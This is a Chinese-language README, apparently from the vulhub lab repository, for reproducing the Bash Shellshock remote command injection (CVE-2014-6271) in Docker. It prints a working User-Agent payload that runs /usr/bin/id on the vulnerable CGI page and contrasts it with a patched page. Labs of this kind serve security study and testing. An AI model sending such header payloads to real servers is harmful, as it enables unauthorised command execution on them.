Files
vulhub/bash/CVE-2014-6271/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

24 lines
533 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Bash Shellshock 远程命令注入漏洞CVE-2014-6271
编译运行:
```
docker compose up -d
```
服务启动后,有两个页面`http://your-ip:8080/victim.cgi``http://your-ip:8080/safe.cgi`。其中safe.cgi是最新版bash生成的页面victim.cgi是bash4.3生成的页面。
将payload附在User-Agent中访问victim.cgi
```
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id
```
命令成功被执行:
![](1.png)
同样的数据包访问safe.cgi不受影响
![](2.png)